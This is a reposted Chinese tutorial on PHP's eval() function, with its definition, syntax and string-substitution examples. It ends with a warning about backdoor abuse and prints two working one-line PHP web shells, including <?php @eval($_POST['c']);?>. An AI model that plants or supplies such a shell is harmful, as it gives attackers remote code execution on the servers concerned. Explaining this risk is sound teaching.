【转】php eval函数用法

php eval ()函数

定义和用法

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码，且必须以分号结尾。

如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false。

语法

eval(phpcode)

提示

返回语句会立即终止对字符串的计算。

该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。

例子

<?php$string = "beautiful";$time = "winter";$str = 'This is a $string $time morning!';echo $str. "<br />";eval("\$str = \"$str\";");echo $str;?> 

输出

This is a $string $time morning!This is a beautiful winter morning! 

首先字符串被替换，其次替换后形成一个完整的赋值命令。

eval命令来源于linux bash shell中的eval命令 ( 参见http://www.linuxeden.com/edu/doctext.php?docid=584 )

---------------------------------------------------------------

eval()是变量赋值后，然后执行

eval有两层意思：

1.组合命令

2.执行命令

<?php$str="hello world"; //比如这个是元算结果$code= "print('\n$str\n');";//这个是保存在数据库内的php代码echo($code);//打印组合后的命令,str字符串被替代了,形成一个完整的php命令,但并是不会执行eval($code);//执行了这条命令?>;

如果被坏人掌握了,可以把eval 命令用于php的后门程序

eval($_POST[cmd]);

可以执行用户提交的任何cmd命令

----------------------------------------------------------------------

php一句话木马

<?php @eval($_POST['c']);?>

任何人都可以post任何文件上来